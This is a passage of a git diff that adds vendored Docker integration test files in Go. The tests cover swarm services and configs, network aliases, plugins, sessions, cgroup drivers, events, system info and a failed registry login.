+				UID:  "0",
+				GID:  "0",
+				Mode: 0777,
+			},
+			ConfigID:   configResp.ID,
+			ConfigName: configName,
+		}),
+	)
+
+	poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances))
+
+	filter := filters.NewArgs()
+	filter.Add("service", serviceID)
+	tasks, err := client.TaskList(ctx, types.TaskListOptions{
+		Filters: filter,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(tasks), 1))
+
+	body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{
+		ShowStdout: true,
+	})
+	assert.NilError(t, err)
+	defer body.Close()
+
+	content, err := ioutil.ReadAll(body)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(string(content), "-rwxrwxrwx"))
+
+	err = client.ServiceRemove(ctx, serviceID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID))
+	poll.WaitOn(t, noTasks(client))
+
+	err = client.ConfigRemove(ctx, configName)
+	assert.NilError(t, err)
+}
+
+func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		filter.Add("service", serviceID)
+		tasks, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(tasks) == int(instances):
+			for _, task := range tasks {
+				if task.Status.State != swarmtypes.TaskStateRunning {
+					return poll.Continue("waiting for tasks to enter run state")
+				}
+			}
+			return poll.Success()
+		default:
+			return poll.Continue("task count at %d waiting for %d", len(tasks), instances)
+		}
+	}
+}
+
+func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		tasks, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(tasks) == 0:
+			return poll.Success()
+		default:
+			return poll.Continue("task count at %d waiting for 0", len(tasks))
+		}
+	}
+}
+
+func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		filter.Add("service", serviceID)
+		_, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		if err == nil {
+			return poll.Continue("waiting for service %s to be deleted", serviceID)
+		}
+		return poll.Success()
+	}
+}
+
+func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		_, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{})
+		if err == nil {
+			return poll.Continue("waiting for network %s to be removed", networkID)
+		}
+		return poll.Success()
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/service/inspect_test.go b/vendor/github.com/docker/docker/integration/service/inspect_test.go
new file mode 100644
index 0000000000..daeabcfe12
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/service/inspect_test.go
@@ -0,0 +1,153 @@
+package service // import "github.com/docker/docker/integration/service"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/google/go-cmp/cmp"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestInspect(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	var now = time.Now()
+	var instances uint64 = 2
+	serviceSpec := fullSwarmServiceSpec("test-service-inspect", instances)
+
+	ctx := context.Background()
+	resp, err := client.ServiceCreate(ctx, serviceSpec, types.ServiceCreateOptions{
+		QueryRegistry: false,
+	})
+	assert.NilError(t, err)
+
+	id := resp.ID
+	poll.WaitOn(t, serviceContainerCount(client, id, instances))
+
+	service, _, err := client.ServiceInspectWithRaw(ctx, id, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+
+	expected := swarmtypes.Service{
+		ID:   id,
+		Spec: serviceSpec,
+		Meta: swarmtypes.Meta{
+			Version:   swarmtypes.Version{Index: uint64(11)},
+			CreatedAt: now,
+			UpdatedAt: now,
+		},
+	}
+	assert.Check(t, is.DeepEqual(service, expected, cmpServiceOpts()))
+}
+
+// TODO: use helpers from gotest.tools/assert/opt when available
+func cmpServiceOpts() cmp.Option {
+	const threshold = 20 * time.Second
+
+	metaTimeFields := func(path cmp.Path) bool {
+		switch path.String() {
+		case "Meta.CreatedAt", "Meta.UpdatedAt":
+			return true
+		}
+		return false
+	}
+	withinThreshold := cmp.Comparer(func(x, y time.Time) bool {
+		delta := x.Sub(y)
+		return delta < threshold && delta > -threshold
+	})
+
+	return cmp.FilterPath(metaTimeFields, withinThreshold)
+}
+
+func fullSwarmServiceSpec(name string, replicas uint64) swarmtypes.ServiceSpec {
+	restartDelay := 100 * time.Millisecond
+	maxAttempts := uint64(4)
+
+	return swarmtypes.ServiceSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: name,
+			Labels: map[string]string{
+				"service-label": "service-label-value",
+			},
+		},
+		TaskTemplate: swarmtypes.TaskSpec{
+			ContainerSpec: &swarmtypes.ContainerSpec{
+				Image:           "busybox:latest",
+				Labels:          map[string]string{"container-label": "container-value"},
+				Command:         []string{"/bin/top"},
+				Args:            []string{"-u", "root"},
+				Hostname:        "hostname",
+				Env:             []string{"envvar=envvalue"},
+				Dir:             "/work",
+				User:            "root",
+				StopSignal:      "SIGINT",
+				StopGracePeriod: &restartDelay,
+				Hosts:           []string{"8.8.8.8  google"},
+				DNSConfig: &swarmtypes.DNSConfig{
+					Nameservers: []string{"8.8.8.8"},
+					Search:      []string{"somedomain"},
+				},
+				Isolation: container.IsolationDefault,
+			},
+			RestartPolicy: &swarmtypes.RestartPolicy{
+				Delay:       &restartDelay,
+				Condition:   swarmtypes.RestartPolicyConditionOnFailure,
+				MaxAttempts: &maxAttempts,
+			},
+			Runtime: swarmtypes.RuntimeContainer,
+		},
+		Mode: swarmtypes.ServiceMode{
+			Replicated: &swarmtypes.ReplicatedService{
+				Replicas: &replicas,
+			},
+		},
+		UpdateConfig: &swarmtypes.UpdateConfig{
+			Parallelism:     2,
+			Delay:           200 * time.Second,
+			FailureAction:   swarmtypes.UpdateFailureActionContinue,
+			Monitor:         2 * time.Second,
+			MaxFailureRatio: 0.2,
+			Order:           swarmtypes.UpdateOrderStopFirst,
+		},
+		RollbackConfig: &swarmtypes.UpdateConfig{
+			Parallelism:     3,
+			Delay:           300 * time.Second,
+			FailureAction:   swarmtypes.UpdateFailureActionPause,
+			Monitor:         3 * time.Second,
+			MaxFailureRatio: 0.3,
+			Order:           swarmtypes.UpdateOrderStartFirst,
+		},
+	}
+}
+
+func serviceContainerCount(client client.ServiceAPIClient, id string, count uint64) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		filter := filters.NewArgs()
+		filter.Add("service", id)
+		tasks, err := client.TaskList(context.Background(), types.TaskListOptions{
+			Filters: filter,
+		})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(tasks) == int(count):
+			return poll.Success()
+		default:
+			return poll.Continue("task count at %d waiting for %d", len(tasks), count)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/service/main_test.go b/vendor/github.com/docker/docker/integration/service/main_test.go
new file mode 100644
index 0000000000..28fd19df4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/service/main_test.go
@@ -0,0 +1,33 @@
+package service // import "github.com/docker/docker/integration/service"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/service/network_test.go b/vendor/github.com/docker/docker/integration/service/network_test.go
new file mode 100644
index 0000000000..4ebbd972a8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/service/network_test.go
@@ -0,0 +1,75 @@
+package service // import "github.com/docker/docker/integration/service"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/integration/internal/swarm"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDockerNetworkConnectAlias(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	name := t.Name() + "test-alias"
+	_, err := client.NetworkCreate(ctx, name, types.NetworkCreate{
+		Driver:     "overlay",
+		Attachable: true,
+	})
+	assert.NilError(t, err)
+
+	cID1 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.NetworkingConfig = &network.NetworkingConfig{
+			EndpointsConfig: map[string]*network.EndpointSettings{
+				name: {},
+			},
+		}
+	})
+
+	err = client.NetworkConnect(ctx, name, cID1, &network.EndpointSettings{
+		Aliases: []string{
+			"aaa",
+		},
+	})
+	assert.NilError(t, err)
+
+	err = client.ContainerStart(ctx, cID1, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	ng1, err := client.ContainerInspect(ctx, cID1)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(ng1.NetworkSettings.Networks[name].Aliases), 2))
+	assert.Check(t, is.Equal(ng1.NetworkSettings.Networks[name].Aliases[0], "aaa"))
+
+	cID2 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.NetworkingConfig = &network.NetworkingConfig{
+			EndpointsConfig: map[string]*network.EndpointSettings{
+				name: {},
+			},
+		}
+	})
+
+	err = client.NetworkConnect(ctx, name, cID2, &network.EndpointSettings{
+		Aliases: []string{
+			"bbb",
+		},
+	})
+	assert.NilError(t, err)
+
+	err = client.ContainerStart(ctx, cID2, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	ng2, err := client.ContainerInspect(ctx, cID2)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(ng2.NetworkSettings.Networks[name].Aliases), 2))
+	assert.Check(t, is.Equal(ng2.NetworkSettings.Networks[name].Aliases[0], "bbb"))
+}
diff --git a/vendor/github.com/docker/docker/integration/service/plugin_test.go b/vendor/github.com/docker/docker/integration/service/plugin_test.go
new file mode 100644
index 0000000000..6c61825220
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/service/plugin_test.go
@@ -0,0 +1,121 @@
+package service
+
+import (
+	"context"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/api/types/swarm/runtime"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"github.com/docker/docker/internal/test/registry"
+	"gotest.tools/assert"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestServicePlugin(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	skip.If(t, testEnv.DaemonInfo.OSType == "windows")
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	defer setupTest(t)()
+
+	reg := registry.NewV2(t)
+	defer reg.Close()
+
+	repo := path.Join(registry.DefaultURL, "swarm", "test:v1")
+	repo2 := path.Join(registry.DefaultURL, "swarm", "test:v2")
+	name := "test"
+
+	d := daemon.New(t)
+	d.StartWithBusybox(t)
+	apiclient := d.NewClientT(t)
+	err := plugin.Create(context.Background(), apiclient, repo)
+	assert.NilError(t, err)
+	r, err := apiclient.PluginPush(context.Background(), repo, "")
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, r)
+	assert.NilError(t, err)
+	err = apiclient.PluginRemove(context.Background(), repo, types.PluginRemoveOptions{})
+	assert.NilError(t, err)
+	err = plugin.Create(context.Background(), apiclient, repo2)
+	assert.NilError(t, err)
+	r, err = apiclient.PluginPush(context.Background(), repo2, "")
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, r)
+	assert.NilError(t, err)
+	err = apiclient.PluginRemove(context.Background(), repo2, types.PluginRemoveOptions{})
+	assert.NilError(t, err)
+	d.Stop(t)
+
+	d1 := swarm.NewSwarm(t, testEnv, daemon.WithExperimental)
+	defer d1.Stop(t)
+	d2 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+1))
+	d2.StartAndSwarmJoin(t, d1, true)
+	defer d2.Stop(t)
+	d3 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+2))
+	d3.StartAndSwarmJoin(t, d1, false)
+	defer d3.Stop(t)
+
+	id := d1.CreateService(t, makePlugin(repo, name, nil))
+	poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll)
+
+	service := d1.GetService(t, id)
+	d1.UpdateService(t, service, makePlugin(repo2, name, nil))
+	poll.WaitOn(t, d1.PluginReferenceIs(name, repo2), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginReferenceIs(name, repo2), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginReferenceIs(name, repo2), swarm.ServicePoll)
+	poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll)
+
+	d1.RemoveService(t, id)
+	poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll)
+
+	// constrain to managers only
+	id = d1.CreateService(t, makePlugin(repo, name, []string{"node.role==manager"}))
+	poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll)
+
+	d1.RemoveService(t, id)
+	poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll)
+
+	// with no name
+	id = d1.CreateService(t, makePlugin(repo, "", nil))
+	poll.WaitOn(t, d1.PluginIsRunning(repo), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsRunning(repo), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsRunning(repo), swarm.ServicePoll)
+
+	d1.RemoveService(t, id)
+	poll.WaitOn(t, d1.PluginIsNotPresent(repo), swarm.ServicePoll)
+	poll.WaitOn(t, d2.PluginIsNotPresent(repo), swarm.ServicePoll)
+	poll.WaitOn(t, d3.PluginIsNotPresent(repo), swarm.ServicePoll)
+}
+
+func makePlugin(repo, name string, constraints []string) func(*swarmtypes.Service) {
+	return func(s *swarmtypes.Service) {
+		s.Spec.TaskTemplate.Runtime = "plugin"
+		s.Spec.TaskTemplate.PluginSpec = &runtime.PluginSpec{
+			Name:   name,
+			Remote: repo,
+		}
+		if constraints != nil {
+			s.Spec.TaskTemplate.Placement = &swarmtypes.Placement{
+				Constraints: constraints,
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/session/main_test.go b/vendor/github.com/docker/docker/integration/session/main_test.go
new file mode 100644
index 0000000000..fc33025efe
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/session/main_test.go
@@ -0,0 +1,33 @@
+package session // import "github.com/docker/docker/integration/session"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/session/session_test.go b/vendor/github.com/docker/docker/integration/session/session_test.go
new file mode 100644
index 0000000000..67a3773abd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/session/session_test.go
@@ -0,0 +1,48 @@
+package session // import "github.com/docker/docker/integration/session"
+
+import (
+	"net/http"
+	"testing"
+
+	req "github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestSessionCreate(t *testing.T) {
+	skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild)
+
+	defer setupTest(t)()
+
+	res, body, err := req.Post("/session", req.With(func(r *http.Request) error {
+		r.Header.Set("X-Docker-Expose-Session-Uuid", "testsessioncreate") // so we don't block default name if something else is using it
+		r.Header.Set("Upgrade", "h2c")
+		return nil
+	}))
+	assert.NilError(t, err)
+	assert.NilError(t, body.Close())
+	assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusSwitchingProtocols))
+	assert.Check(t, is.Equal(res.Header.Get("Upgrade"), "h2c"))
+}
+
+func TestSessionCreateWithBadUpgrade(t *testing.T) {
+	skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild)
+
+	res, body, err := req.Post("/session")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest))
+	buf, err := req.ReadBody(body)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(string(buf), "no upgrade"))
+
+	res, body, err = req.Post("/session", req.With(func(r *http.Request) error {
+		r.Header.Set("Upgrade", "foo")
+		return nil
+	}))
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest))
+	buf, err = req.ReadBody(body)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(string(buf), "not supported"))
+}
diff --git a/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go
new file mode 100644
index 0000000000..449c83fdab
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go
@@ -0,0 +1,56 @@
+package system
+
+import (
+	"context"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/daemon"
+
+	"gotest.tools/assert"
+)
+
+// hasSystemd checks whether the host was booted with systemd as its init
+// system. Stolen from
+// https://github.com/coreos/go-systemd/blob/176f85496f4e/util/util.go#L68
+func hasSystemd() bool {
+	fi, err := os.Lstat("/run/systemd/system")
+	if err != nil {
+		return false
+	}
+	return fi.IsDir()
+}
+
+// TestCgroupDriverSystemdMemoryLimit checks that container
+// memory limit can be set when using systemd cgroupdriver.
+//  https://github.com/moby/moby/issues/35123
+func TestCgroupDriverSystemdMemoryLimit(t *testing.T) {
+	t.Parallel()
+
+	if !hasSystemd() {
+		t.Skip("systemd not available")
+	}
+
+	d := daemon.New(t)
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+	d.StartWithBusybox(t, "--exec-opt", "native.cgroupdriver=systemd", "--iptables=false")
+	defer d.Stop(t)
+
+	const mem = 64 * 1024 * 1024 // 64 MB
+
+	ctx := context.Background()
+	ctrID := container.Create(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.HostConfig.Resources.Memory = mem
+	})
+	defer client.ContainerRemove(ctx, ctrID, types.ContainerRemoveOptions{Force: true})
+
+	err = client.ContainerStart(ctx, ctrID, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	s, err := client.ContainerInspect(ctx, ctrID)
+	assert.NilError(t, err)
+	assert.Equal(t, s.HostConfig.Memory, mem)
+}
diff --git a/vendor/github.com/docker/docker/integration/system/event_test.go b/vendor/github.com/docker/docker/integration/system/event_test.go
new file mode 100644
index 0000000000..6e86f4ad95
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/event_test.go
@@ -0,0 +1,122 @@
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	req "github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestEventsExecDie(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions")
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client)
+
+	id, err := client.ContainerExecCreate(ctx, cID,
+		types.ExecConfig{
+			Cmd: strslice.StrSlice([]string{"echo", "hello"}),
+		},
+	)
+	assert.NilError(t, err)
+
+	filters := filters.NewArgs(
+		filters.Arg("container", cID),
+		filters.Arg("event", "exec_die"),
+	)
+	msg, errors := client.Events(ctx, types.EventsOptions{
+		Filters: filters,
+	})
+
+	err = client.ContainerExecStart(ctx, id.ID,
+		types.ExecStartCheck{
+			Detach: true,
+			Tty:    false,
+		},
+	)
+	assert.NilError(t, err)
+
+	select {
+	case m := <-msg:
+		assert.Equal(t, m.Type, "container")
+		assert.Equal(t, m.Actor.ID, cID)
+		assert.Equal(t, m.Action, "exec_die")
+		assert.Equal(t, m.Actor.Attributes["execID"], id.ID)
+		assert.Equal(t, m.Actor.Attributes["exitCode"], "0")
+	case err = <-errors:
+		t.Fatal(err)
+	case <-time.After(time.Second * 3):
+		t.Fatal("timeout hit")
+	}
+
+}
+
+// Test case for #18888: Events messages have been switched from generic
+// `JSONMessage` to `events.Message` types. The switch does not break the
+// backward compatibility so old `JSONMessage` could still be used.
+// This test verifies that backward compatibility maintains.
+func TestEventsBackwardsCompatible(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	since := request.DaemonTime(ctx, t, client, testEnv)
+	ts := strconv.FormatInt(since.Unix(), 10)
+
+	cID := container.Create(t, ctx, client)
+
+	// In case there is no events, the API should have responded immediately (not blocking),
+	// The test here makes sure the response time is less than 3 sec.
+	expectedTime := time.Now().Add(3 * time.Second)
+	emptyResp, emptyBody, err := req.Get("/events")
+	assert.NilError(t, err)
+	defer emptyBody.Close()
+	assert.Check(t, is.DeepEqual(http.StatusOK, emptyResp.StatusCode))
+	assert.Check(t, time.Now().Before(expectedTime), "timeout waiting for events api to respond, should have responded immediately")
+
+	// We also test to make sure the `events.Message` is compatible with `JSONMessage`
+	q := url.Values{}
+	q.Set("since", ts)
+	_, body, err := req.Get("/events?" + q.Encode())
+	assert.NilError(t, err)
+	defer body.Close()
+
+	dec := json.NewDecoder(body)
+	var containerCreateEvent *jsonmessage.JSONMessage
+	for {
+		var event jsonmessage.JSONMessage
+		if err := dec.Decode(&event); err != nil {
+			if err == io.EOF {
+				break
+			}
+			t.Fatal(err)
+		}
+		if event.Status == "create" && event.ID == cID {
+			containerCreateEvent = &event
+			break
+		}
+	}
+
+	assert.Check(t, containerCreateEvent != nil)
+	assert.Check(t, is.Equal("create", containerCreateEvent.Status))
+	assert.Check(t, is.Equal(cID, containerCreateEvent.ID))
+	assert.Check(t, is.Equal("busybox", containerCreateEvent.From))
+}
diff --git a/vendor/github.com/docker/docker/integration/system/info_linux_test.go b/vendor/github.com/docker/docker/integration/system/info_linux_test.go
new file mode 100644
index 0000000000..50fa9874b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/info_linux_test.go
@@ -0,0 +1,48 @@
+// +build !windows
+
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"context"
+	"net/http"
+	"testing"
+
+	"github.com/docker/docker/internal/test/request"
+	req "github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestInfoBinaryCommits(t *testing.T) {
+	client := request.NewAPIClient(t)
+
+	info, err := client.Info(context.Background())
+	assert.NilError(t, err)
+
+	assert.Check(t, "N/A" != info.ContainerdCommit.ID)
+	assert.Check(t, is.Equal(testEnv.DaemonInfo.ContainerdCommit.Expected, info.ContainerdCommit.Expected))
+	assert.Check(t, is.Equal(info.ContainerdCommit.Expected, info.ContainerdCommit.ID))
+
+	assert.Check(t, "N/A" != info.InitCommit.ID)
+	assert.Check(t, is.Equal(testEnv.DaemonInfo.InitCommit.Expected, info.InitCommit.Expected))
+	assert.Check(t, is.Equal(info.InitCommit.Expected, info.InitCommit.ID))
+
+	assert.Check(t, "N/A" != info.RuncCommit.ID)
+	assert.Check(t, is.Equal(testEnv.DaemonInfo.RuncCommit.Expected, info.RuncCommit.Expected))
+	assert.Check(t, is.Equal(info.RuncCommit.Expected, info.RuncCommit.ID))
+}
+
+func TestInfoAPIVersioned(t *testing.T) {
+	// Windows only supports 1.25 or later
+
+	res, body, err := req.Get("/v1.20/info")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK))
+
+	b, err := req.ReadBody(body)
+	assert.NilError(t, err)
+
+	out := string(b)
+	assert.Check(t, is.Contains(out, "ExecutionDriver"))
+	assert.Check(t, is.Contains(out, "not supported"))
+}
diff --git a/vendor/github.com/docker/docker/integration/system/info_test.go b/vendor/github.com/docker/docker/integration/system/info_test.go
new file mode 100644
index 0000000000..2a05dfbb74
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/info_test.go
@@ -0,0 +1,42 @@
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"context"
+	"fmt"
+	"testing"
+
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestInfoAPI(t *testing.T) {
+	client := request.NewAPIClient(t)
+
+	info, err := client.Info(context.Background())
+	assert.NilError(t, err)
+
+	// always shown fields
+	stringsToCheck := []string{
+		"ID",
+		"Containers",
+		"ContainersRunning",
+		"ContainersPaused",
+		"ContainersStopped",
+		"Images",
+		"LoggingDriver",
+		"OperatingSystem",
+		"NCPU",
+		"OSType",
+		"Architecture",
+		"MemTotal",
+		"KernelVersion",
+		"Driver",
+		"ServerVersion",
+		"SecurityOptions"}
+
+	out := fmt.Sprintf("%+v", info)
+	for _, linePrefix := range stringsToCheck {
+		assert.Check(t, is.Contains(out, linePrefix))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/system/login_test.go b/vendor/github.com/docker/docker/integration/system/login_test.go
new file mode 100644
index 0000000000..ad1a8756dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/login_test.go
@@ -0,0 +1,28 @@
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/requirement"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+// Test case for GitHub 22244
+func TestLoginFailsWithBadCredentials(t *testing.T) {
+	skip.If(t, !requirement.HasHubConnectivity(t))
+
+	client := request.NewAPIClient(t)
+
+	config := types.AuthConfig{
+		Username: "no-user",
+		Password: "no-password",
+	}
+	_, err := client.RegistryLogin(context.Background(), config)
+	expected := "Error response from daemon: Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password"
+	assert.Check(t, is.Error(err, expected))
+}
diff --git a/vendor/github.com/docker/docker/integration/system/main_test.go b/vendor/github.com/docker/docker/integration/system/main_test.go
new file mode 100644
index 0000000000..f19a3157aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/main_test.go
@@ -0,0 +1,33 @@
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
